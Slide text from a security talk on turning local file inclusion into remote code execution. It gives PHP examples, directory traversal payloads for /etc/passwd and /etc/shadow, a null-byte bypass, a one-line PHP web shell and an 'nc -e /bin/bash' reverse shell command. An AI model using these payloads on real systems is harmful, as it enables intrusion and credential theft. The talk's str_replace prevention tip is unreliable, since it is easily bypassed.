This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.

1. Journey From LFI to RCE
-G.Manideep
@mani0x00

2. #Who am I?
Member at #nullhyd
Pursuing B.tech 4th year
Jack of all,Master of none!
Interested in Information Security

3. #What is I’m gonna talk?
LFI
RFI 10%
RCE
And …. Demo’s ;) − 90%

4. #What you need to know?
Cd .. (how to change directories :p )
Netcat
Little knowledge on Php
Ssh
Let’s Go!!!

5. #Disclaimer

6. #Local File Inclusion
Local File Inclusion is the process of including files on
a server through the web browser. This vulnerability
occurs when a page include is not properly sanitized,
and allows directory traversal characters to be injected.
<?php
$page=$_GET[“page”];
include($_GET[“$page”]);  Vulnerable !!
?>

7. #Local File Inclusion
What if the attacker assigns page to be
"../../../../etc/passwd". It causes the attacker to read a
content from /etc/passwd.
Vulnerable Function’s leads to LFI
-include()
-include_once()
-require()
-require_once()
-fopen()

8. #Finding Vul Functions
Make Mistakes! :D

9. #Local File Inclusion
<?php
if($_GET[“page”]) {
$file = preg_replace(‘/x00.*/’, “” ,$file);
include($file);
}
?>
o In This Case we may use terminator’s(%00) to execute LFI
Eg: ?page=../../../../../../../../var/log/auth.log%00

10. #Local File Inclusion
Some Directories to verify LFI.
 etc/passwd
 /etc/shadow
 /etc/group
 /etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
Database Configuration
i.e: config.inc.php

11. #Remote File Inclusion
RFI stands for Remote File Inclusion that allows the attacker to
upload a custom coded/malicious file on a website or server. The
vulnerability exploit the poor validation checks in websites and
can eventually lead to code execution on server or code execution
on website (XSS attack using JavaScript).
<?php
$file ="http://Somesite/c99.php?"; //$_GET['page'];
include($file .".php"); //include (http://Somesite/C99.php?.php)
?>

12. #Prevention
Do not permit appending file paths directly.
Use str_replace(‘../’, ‘ ’, $_GET[‘file’]);
If you definitely need dynamic path concatenation,
ensure you only accept required characters such as "a-Z
0-9" and do not allow ".." or "/" or "%00" (null byte) or
any other similar unexpected characters.

13. #Demo On LFI&RFI

14. #Remember
Finding o Exploitation

15. #Exploitation
Verifying RCE with phpinfo()
Verifying the hack by ping our machine.
Getting a Shell

16. #Remote Code Execution
The Process of executing own script’s on the Web
Server Remotely is called “Remote Code Execution”.

17. #Verifying the Hack
Let’s Ping ourself!

18. #Shell Time
Include a malicious php code
<?php exec($_GET[‘cmd’]); ?>
Let’s make a GET request
…..&cmd=nc <ip> <port> -e /bin/bash

19. #Log Locations
../apache/logs/error.log
../apache/logs/access.log
../etc/httpd/logs/acces_log
../usr/local/apache/logs/access. Log
../var/log/apache2/error_log
../var/www/logs/error_log

20. #Thanks!